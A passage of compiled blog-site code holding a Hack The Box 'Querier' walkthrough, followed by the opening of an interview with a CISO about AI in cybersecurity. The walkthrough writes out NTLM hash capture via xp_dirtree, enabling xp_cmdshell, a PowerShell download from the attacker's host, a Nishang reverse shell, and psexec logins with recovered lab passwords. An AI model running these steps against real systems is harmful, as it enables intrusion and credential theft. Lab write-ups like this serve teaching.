progress.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Ping.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"ping 10.10.10.125\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"Machine IP\",className:\"framer-image\",height:\"115\",src:\"https://framerusercontent.com/images/2cCa9JjRrQX3YSvmjOwZwtaqd0.png\",srcSet:\"https://framerusercontent.com/images/2cCa9JjRrQX3YSvmjOwZwtaqd0.png?scale-down-to=512 512w,https://framerusercontent.com/images/2cCa9JjRrQX3YSvmjOwZwtaqd0.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/2cCa9JjRrQX3YSvmjOwZwtaqd0.png 1920w\",style:{aspectRatio:\"1920 / 230\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Querier IP.\"}),/*#__PURE__*/e(\"img\",{alt:\"ping\",className:\"framer-image\",height:\"144\",src:\"https://framerusercontent.com/images/qpLKrdifnRpo1Sm3f6esf0Ig.png\",srcSet:\"https://framerusercontent.com/images/qpLKrdifnRpo1Sm3f6esf0Ig.png?scale-down-to=512 512w,https://framerusercontent.com/images/qpLKrdifnRpo1Sm3f6esf0Ig.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/qpLKrdifnRpo1Sm3f6esf0Ig.png 1920w\",style:{aspectRatio:\"1920 / 288\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Doing ping.\"}),/*#__PURE__*/t(\"p\",{children:[\"Next, we can use \",/*#__PURE__*/e(\"code\",{children:\"nmap\"}),\" to find open ports in the machine. A simple port scanning is enough for our purposes.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"nmap -Pn 10.10.10.125\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"Scanning ports\",className:\"framer-image\",height:\"172\",src:\"https://framerusercontent.com/images/KOCU0LMnCrGHolAspEefK80qY.png\",srcSet:\"https://framerusercontent.com/images/KOCU0LMnCrGHolAspEefK80qY.png?scale-down-to=512 512w,https://framerusercontent.com/images/KOCU0LMnCrGHolAspEefK80qY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/KOCU0LMnCrGHolAspEefK80qY.png 1920w\",style:{aspectRatio:\"1920 / 344\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Port scanning.\"}),/*#__PURE__*/t(\"p\",{children:[\"We see 4 open ports (\",/*#__PURE__*/e(\"code\",{children:\"135\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"139\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"445\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"1433\"}),\") and among these, we found two interesting services, \",/*#__PURE__*/e(\"code\",{children:\"microsoft-ds (SMB)\"}),\" in port \",/*#__PURE__*/e(\"code\",{children:\"445\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"ms-sql-s\"}),\" in port \",/*#__PURE__*/e(\"code\",{children:\"1433\"}),\". When we try to access via SMB, it shows us a shared folder called Report with a .xlsm file, the extension indicating a Microsoft Excel Document.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Public share\",className:\"framer-image\",height:\"90\",src:\"https://framerusercontent.com/images/ZwBnLxdeBbR5NfzmNlJ7YuGAcg.png\",srcSet:\"https://framerusercontent.com/images/ZwBnLxdeBbR5NfzmNlJ7YuGAcg.png?scale-down-to=512 512w,https://framerusercontent.com/images/ZwBnLxdeBbR5NfzmNlJ7YuGAcg.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/ZwBnLxdeBbR5NfzmNlJ7YuGAcg.png 1920w\",style:{aspectRatio:\"1920 / 180\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Public share.\"}),/*#__PURE__*/e(\"p\",{children:\"Then we open the specified file with Microsoft Excel and a warning message appears telling us that the file contains a suspicious macro.\"}),/*#__PURE__*/e(\"img\",{alt:\"Security alert - Macro\",className:\"framer-image\",height:\"432\",src:\"https://framerusercontent.com/images/Vmr7x6ijUvd3xa1MYkRpgB6BoEE.png\",srcSet:\"https://framerusercontent.com/images/Vmr7x6ijUvd3xa1MYkRpgB6BoEE.png?scale-down-to=512 512w,https://framerusercontent.com/images/Vmr7x6ijUvd3xa1MYkRpgB6BoEE.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Vmr7x6ijUvd3xa1MYkRpgB6BoEE.png 1920w\",style:{aspectRatio:\"1920 / 864\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Macro alert.\"}),/*#__PURE__*/e(\"p\",{children:\"We can explore the macro code in Microsoft Excel using the option Visual Basic in the Developer Tab. The macro has an insecure configuration of a connection to SQL Server, the credentials are in plain text and now we can use them. It\u2019s a good example of something that we should never do.\"}),/*#__PURE__*/e(\"img\",{alt:\"Macro code\",className:\"framer-image\",height:\"332\",src:\"https://framerusercontent.com/images/m5Z25RyvWGoDizE4YaFgU7GQaPE.png\",srcSet:\"https://framerusercontent.com/images/m5Z25RyvWGoDizE4YaFgU7GQaPE.png?scale-down-to=512 512w,https://framerusercontent.com/images/m5Z25RyvWGoDizE4YaFgU7GQaPE.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/m5Z25RyvWGoDizE4YaFgU7GQaPE.png 1920w\",style:{aspectRatio:\"1920 / 664\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Macro code.\"}),/*#__PURE__*/e(\"h2\",{children:\"Getting the user\"}),/*#__PURE__*/t(\"p\",{children:[\"Now we can connect to the other interesting service that we found: \",/*#__PURE__*/e(\"code\",{children:\"ms-sql-s\"}),\". We use the module \",/*#__PURE__*/e(\"code\",{children:\"mssqlclient.py\"}),\" of Impacket to do queries to the server interactively using the credentials found in the last step, for example, a query to know the version of SQL Server like the first testing query.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"mssqlclient.py -windows-auth QUERIER/reporting:PcwTWTHRwryjc\\\\$c6@10.10.10.125\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"mssql\",className:\"framer-image\",height:\"218\",src:\"https://framerusercontent.com/images/R9jNKsvi7t9Mzq6La7FLQE8qWQ.png\",srcSet:\"https://framerusercontent.com/images/R9jNKsvi7t9Mzq6La7FLQE8qWQ.png?scale-down-to=512 512w,https://framerusercontent.com/images/R9jNKsvi7t9Mzq6La7FLQE8qWQ.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/R9jNKsvi7t9Mzq6La7FLQE8qWQ.png 1920w\",style:{aspectRatio:\"1920 / 436\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Mssql connection.\"}),/*#__PURE__*/t(\"p\",{children:[\"We will use this service to gain system access, as a user without privileges. We mount an SMB server in our machine to capture the authentication of any Windows user, in this case, the user that executes the service \",/*#__PURE__*/e(\"code\",{children:\"ms-sql-s\"}),\". We tell it to enter our share to capture its \",/*#__PURE__*/e(\"code\",{children:\"NTLMv2\"}),\" hash with an \",/*#__PURE__*/e(\"code\",{children:\"xp_dirtree\"}),\" query. This stored procedure of SQL Server will access our SMB share to display a list of every folder, every subfolder, and every file.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> EXEC master.sys.xp_dirtree '\\\\\\\\10.10.15.1\\\\querier';\",language:\"Shell\"})})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"smbserver.py -smb2support querier Documents/\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"User hash\",className:\"framer-image\",height:\"174\",src:\"https://framerusercontent.com/images/FexiIxAy4WXtInpyTomgr6BU14.png\",srcSet:\"https://framerusercontent.com/images/FexiIxAy4WXtInpyTomgr6BU14.png?scale-down-to=512 512w,https://framerusercontent.com/images/FexiIxAy4WXtInpyTomgr6BU14.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/FexiIxAy4WXtInpyTomgr6BU14.png 1920w\",style:{aspectRatio:\"1920 / 348\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"User hash.\"}),/*#__PURE__*/t(\"p\",{children:[\"Then we copy the hash to a plain text file and use John the Ripper with the dictionary \",/*#__PURE__*/e(\"code\",{children:\"rockyou.txt\"}),\" to crack the captured hash. We need to specify the correct hash format because John the Ripper occasionally recognizes your hashes as the wrong type. This is inevitable because some hashes look identical, in this case the correct format for \",/*#__PURE__*/e(\"code\",{children:\"NTLMv2\"}),\" is \",/*#__PURE__*/e(\"code\",{children:\"netntlmv2\"}),\".\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:'$ john.exe --wordlist=rockyou.txt --format-netntlmv2 \\\\\\\\\\n     \"\\\\Users\\\\dette\\\\HackTheBox\\\\Querier\\\\hash_mssql-svc.txt\"',language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"Running John\",className:\"framer-image\",height:\"178\",src:\"https://framerusercontent.com/images/YCDi4cuaXUPThKF7zRaJbu5IMo.png\",srcSet:\"https://framerusercontent.com/images/YCDi4cuaXUPThKF7zRaJbu5IMo.png?scale-down-to=512 512w,https://framerusercontent.com/images/YCDi4cuaXUPThKF7zRaJbu5IMo.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/YCDi4cuaXUPThKF7zRaJbu5IMo.png 1920w\",style:{aspectRatio:\"1920 / 356\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Running John.\"}),/*#__PURE__*/t(\"p\",{children:[\"Now we can connect to SQL Server as user \",/*#__PURE__*/e(\"code\",{children:\"mssql-svc\"}),\". We try to execute the command \",/*#__PURE__*/e(\"code\",{children:\"whoami\"}),\", however, it responds telling us that component \",/*#__PURE__*/e(\"code\",{children:\"xp_cmdshell\"}),\" is blocked. Since we are the service administrator, we can enable it using a few queries.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"python mssqlclient.py -windows-auth QUERIER/mssql-svc:corporate568@10.10.10.125\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"xp_cmdshell disabled\",className:\"framer-image\",height:\"187\",src:\"https://framerusercontent.com/images/qZ5Ex1U7H7NIOJsKuuykRcOSA.png\",srcSet:\"https://framerusercontent.com/images/qZ5Ex1U7H7NIOJsKuuykRcOSA.png?scale-down-to=512 512w,https://framerusercontent.com/images/qZ5Ex1U7H7NIOJsKuuykRcOSA.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/qZ5Ex1U7H7NIOJsKuuykRcOSA.png 1920w\",style:{aspectRatio:\"1920 / 375\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"xp_cmdshell disabled.\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> EXEC sp_configure 'show advanced options', 1;\\n> EXEC sp_configure reconfigure;\\n> EXEC sp_configure 'xp_cmdshell', 1;\\n> EXEC sp_configure reconfigure;\\n> EXEC master.dbo.xp_cmdshell 'whoami';\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"xp_cmdshell enabled\",className:\"framer-image\",height:\"290\",src:\"https://framerusercontent.com/images/GDtOQWFGMwXfY66eiHpFAJhkQQ.png\",srcSet:\"https://framerusercontent.com/images/GDtOQWFGMwXfY66eiHpFAJhkQQ.png?scale-down-to=512 512w,https://framerusercontent.com/images/GDtOQWFGMwXfY66eiHpFAJhkQQ.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/GDtOQWFGMwXfY66eiHpFAJhkQQ.png 1920w\",style:{aspectRatio:\"1920 / 580\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"xp_cmdshell enabled.\"}),/*#__PURE__*/e(\"p\",{children:\"Because we can execute commands, reading the user flag is now possible.\"}),/*#__PURE__*/e(\"img\",{alt:\"User flag\",className:\"framer-image\",height:\"161\",src:\"https://framerusercontent.com/images/W34E5IbAkcJcpV1At6zOJREs88.png\",srcSet:\"https://framerusercontent.com/images/W34E5IbAkcJcpV1At6zOJREs88.png?scale-down-to=512 512w,https://framerusercontent.com/images/W34E5IbAkcJcpV1At6zOJREs88.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/W34E5IbAkcJcpV1At6zOJREs88.png 1920w\",style:{aspectRatio:\"1920 / 322\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"User flag.\"}),/*#__PURE__*/e(\"h2\",{children:\"Getting the root\"}),/*#__PURE__*/t(\"p\",{children:[\"This method of executing commands may be an inconvenient way to escalate privileges, so we will upload a shell to the server. To do this we will use the script \",/*#__PURE__*/e(\"code\",{children:\"Invoke-PowerShellTcp.ps1\"}),\" of \",/*#__PURE__*/e(\"code\",{children:\"Nishang\"}),\" framework. Before uploading the shell we add our IP address and some free port to make the connection.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.1 -Port 30000\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"Invoke-PowerShellTcp code\",className:\"framer-image\",height:\"130\",src:\"https://framerusercontent.com/images/VPDDiigXU89W3wgpPlovweaqLmg.png\",srcSet:\"https://framerusercontent.com/images/VPDDiigXU89W3wgpPlovweaqLmg.png?scale-down-to=512 512w,https://framerusercontent.com/images/VPDDiigXU89W3wgpPlovweaqLmg.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/VPDDiigXU89W3wgpPlovweaqLmg.png 1920w\",style:{aspectRatio:\"1920 / 260\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Invoke-PowerShellTcp code.\"}),/*#__PURE__*/e(\"p\",{children:\"Then it is necessary to start an HTTP server in our machine. We can do it with Python3.\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"python -m http.server\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"HTTP server\",className:\"framer-image\",height:\"81\",src:\"https://framerusercontent.com/images/XuCtuyErx8DeNTvVazRQeZ5ucOE.png\",srcSet:\"https://framerusercontent.com/images/XuCtuyErx8DeNTvVazRQeZ5ucOE.png?scale-down-to=512 512w,https://framerusercontent.com/images/XuCtuyErx8DeNTvVazRQeZ5ucOE.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/XuCtuyErx8DeNTvVazRQeZ5ucOE.png 1920w\",style:{aspectRatio:\"1920 / 162\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Http server.\"}),/*#__PURE__*/e(\"p\",{children:\"To make the server download our file, we can use Powershell as follows.\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> EXEC master.dbo.xp_cmdshell 'powershell.exe \\\\\\\\\\n       Invoke-WebRequest http://10.10.15.1:8000/Invoke-PowerShellTcp.ps1 \\\\\\\\\\n       -OutFile c:\\\\Users\\\\mssql-svc\\\\Music\\\\Invoke-PowerShellTcp.ps1';\",language:\"Shell\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Now to get an interactive shell we set our machine to listen \",/*#__PURE__*/e(\"code\",{children:\"port 30000\"}),\" and execute the script in the HTB machine.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"nc -lvp 30000\",language:\"Shell\"})})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> EXEC master.dbo.xp_cmdshell 'powershell.exe \\\\\\\\\\n       c:\\\\Users\\\\mssql-svc\\\\Music\\\\Invoke-PowerShellTcp.ps1';\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"Interactive shell\",className:\"framer-image\",height:\"144\",src:\"https://framerusercontent.com/images/D1x15qfyrlmRuWD1NobVR0bxg20.png\",srcSet:\"https://framerusercontent.com/images/D1x15qfyrlmRuWD1NobVR0bxg20.png?scale-down-to=512 512w,https://framerusercontent.com/images/D1x15qfyrlmRuWD1NobVR0bxg20.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/D1x15qfyrlmRuWD1NobVR0bxg20.png 1920w\",style:{aspectRatio:\"1920 / 288\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Interactive shell.\"}),/*#__PURE__*/t(\"p\",{children:[\"At this point we use the module \",/*#__PURE__*/e(\"code\",{children:\"PowerUp.ps1\"}),\" from the \",/*#__PURE__*/e(\"code\",{children:\"PowerSploit\"}),\" collection to scan the system to find a way to escalate privileges. We can use the same method as in the last step. We upload the file to the server with Python3.\"]}),/*#__PURE__*/t(\"p\",{children:[\"To execute the script we need to import it first, next we can run all checks with the command \",/*#__PURE__*/e(\"code\",{children:\"Invoke-AllChecks\"}),\". It will output any identifiable vulnerabilities along with specifications for any abuse functions.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> Import-Module C:\\\\Users\\\\mssql-svc\\\\Music\\\\PowerUp.ps1\\n> Invoke-AllChecks\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"Running PowerUp.ps1\",className:\"framer-image\",height:\"110\",src:\"https://framerusercontent.com/images/Q724sQ6L40rmLq8kz0YkvKJCPN4.png\",srcSet:\"https://framerusercontent.com/images/Q724sQ6L40rmLq8kz0YkvKJCPN4.png?scale-down-to=512 512w,https://framerusercontent.com/images/Q724sQ6L40rmLq8kz0YkvKJCPN4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Q724sQ6L40rmLq8kz0YkvKJCPN4.png 1920w\",style:{aspectRatio:\"1920 / 220\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Running PowerUp.ps1.\"}),/*#__PURE__*/e(\"p\",{children:\"We can see the Administrator credentials in plain text in the script output. The script took advantage of an insecure configuration in Group Policy Preferences of Windows; it saves credentials with weak encryptions. It\u2019s time to prove these and to obtain the root flag.\"}),/*#__PURE__*/e(\"img\",{alt:\"Root credentials\",className:\"framer-image\",height:\"140\",src:\"https://framerusercontent.com/images/TWe4xnTcPoEegRpOj7C6Dc5Gs0.png\",srcSet:\"https://framerusercontent.com/images/TWe4xnTcPoEegRpOj7C6Dc5Gs0.png?scale-down-to=512 512w,https://framerusercontent.com/images/TWe4xnTcPoEegRpOj7C6Dc5Gs0.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/TWe4xnTcPoEegRpOj7C6Dc5Gs0.png 1920w\",style:{aspectRatio:\"1920 / 280\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Root credentials.\"}),/*#__PURE__*/t(\"p\",{children:[\"Finally, we can get an interactive shell as Administrator with \",/*#__PURE__*/e(\"code\",{children:\"psxec.py\"}),\" from \",/*#__PURE__*/e(\"code\",{children:\"Impacket\"}),\". With this, we can read the root flag.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"python psexec.py QUERIER/Administrator:MyUnclesAreMarioAndLuigi!!1!@10.10.10.125\",language:\"Shell\"})})}),/*#__PURE__*/e(\"img\",{alt:\"psexec.py\",className:\"framer-image\",height:\"236\",src:\"https://framerusercontent.com/images/pldLFb8dxNl3NtjOHTYRKE9IE9g.png\",srcSet:\"https://framerusercontent.com/images/pldLFb8dxNl3NtjOHTYRKE9IE9g.png?scale-down-to=512 512w,https://framerusercontent.com/images/pldLFb8dxNl3NtjOHTYRKE9IE9g.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/pldLFb8dxNl3NtjOHTYRKE9IE9g.png 1920w\",style:{aspectRatio:\"1920 / 472\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Running psexec.py.\"}),/*#__PURE__*/e(\"p\",{children:\"Another way to get the root flag could be to find the file\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"C:\\\\ProgramData\\\\Microsoft\\\\Group Policy\\\\History\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\Machine\\\\Preferences\\\\Groups\\\\Groups.xml\",language:\"Shell\"})})}),/*#__PURE__*/t(\"p\",{children:[\"using a native tool like \",/*#__PURE__*/e(\"code\",{children:\"findstr\"}),\" and decrypt the password using the \",/*#__PURE__*/e(\"code\",{children:\"gpp-decrypt\"}),\" tool of Kali Linux.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Encrypted password\",className:\"framer-image\",height:\"68\",src:\"https://framerusercontent.com/images/kcW8HOYWmUyyHnGzssZ3W2YbPg.png\",srcSet:\"https://framerusercontent.com/images/kcW8HOYWmUyyHnGzssZ3W2YbPg.png?scale-down-to=512 512w,https://framerusercontent.com/images/kcW8HOYWmUyyHnGzssZ3W2YbPg.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/kcW8HOYWmUyyHnGzssZ3W2YbPg.png 1916w\",style:{aspectRatio:\"1916 / 137\"},width:\"958\"}),/*#__PURE__*/e(\"h6\",{children:\"Encrypted password.\"}),/*#__PURE__*/e(\"img\",{alt:\"Decrypted password\",className:\"framer-image\",height:\"51\",src:\"https://framerusercontent.com/images/dtaSF3X5Uz7f49Ifw3gqpqojy0M.png\",srcSet:\"https://framerusercontent.com/images/dtaSF3X5Uz7f49Ifw3gqpqojy0M.png?scale-down-to=512 512w,https://framerusercontent.com/images/dtaSF3X5Uz7f49Ifw3gqpqojy0M.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/dtaSF3X5Uz7f49Ifw3gqpqojy0M.png 1912w\",style:{aspectRatio:\"1912 / 103\"},width:\"956\"}),/*#__PURE__*/e(\"h6\",{children:\"Decrypted password.\"}),/*#__PURE__*/t(\"p\",{children:[\"In this challenge, we saw some insecure configurations such as saved credentials in plain text in code. We also learned how to start an SMB server in our machine to capture hashes and finally, we learned and used some important tools for \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/penetration-testing/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"pentesting\"})}),\" in Windows like Impacket, Nishang, and PowerSploit.\"]})]});export const richText8=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Our guest\"}),/*#__PURE__*/t(\"p\",{children:[\"Nicol\\xe1s is the Chief Information Security Officer (CISO) of \",/*#__PURE__*/e(o,{href:\"https://empresa.corona.co/nuestra-compania/quienes-somos\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Corona;\"})}),\" a Colombian Multinational company dedicated to manufacturing ceramics for home improvement, construction, industry, agriculture, and energy markets. Corona has 20 production plants in Colombia, 3 in the US, 3 in M\\xe9xico and 3 in Central America.\"]}),/*#__PURE__*/e(\"h2\",{children:\"AI in cybersecurity\"}),/*#__PURE__*/t(\"p\",{children:[\"We started by speaking about the emergence of machine learning (\",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\") and artificial intelligence (\",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\") in cybersecurity, a hot topic right now.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"What is your opinion on the potential applications of \"}),/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(\"strong\",{children:\"ML\"})}),/*#__PURE__*/e(\"strong\",{children:\" and \"}),/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(\"strong\",{children:\"AI\"})}),\" \",/*#__PURE__*/e(\"strong\",{children:\"in cybersecurity? Do you believe this potential is real,\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"or it is just a hype?\"})]}),/*#__PURE__*/t(\"ol\",{style:{\"--list-style-type\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:'\"My stand is halfway. A hype might be in one end, and a solve-it-all approach in the other.'})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"I consider \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\" as valuable approximations to leverage behavioral information for cybersecurity; for instance, to detect anomalies. We have a significant restriction with current detection systems: they work based on who the user is, not on his/her behavior. There is no behavioral baseline. Behavior-based intrusion detection enabled by \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\" is a step forward allowing organizations to be more efficient.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"A kind of hype is present in how \",/*#__PURE__*/e(\"code\",{children:\"IT\"}),\" providers market their newest products and how they describe their applications. Some companies suggest something like \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\" are the \u201Csolution to all problems.\u201D Others sell \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\" \u201Cembodied\u201D as assistants to managerial decisions, conveying a robotic way of enforcing security policies and containing incidents. I don\u2019t see myself doing that; I think we\u2019re not there. Nonetheless, we haven\u2019t learned enough \u2014or adequately\u2014 about risks from the behavior of the users we protect; even less we can program machines to understand and leverage users\u2019 behavior. The machines\u2019 capability to detect and restrain cyberattacks automatically is still far in the future. I think the human criterion, the human brain is and will continue to be essential for decision-making in cybersecurity. I do not deny these capabilities exists. In some \",/*#__PURE__*/e(\"code\",{children:\"AI-powered\"}),\" customer service applications, you cannot identify easily whether the other party is a robot. There are operations in which \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),' could add value to our business, but I don\u2019t see it as a replacement for high-order decision-making.\"']})})]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Are you deploying 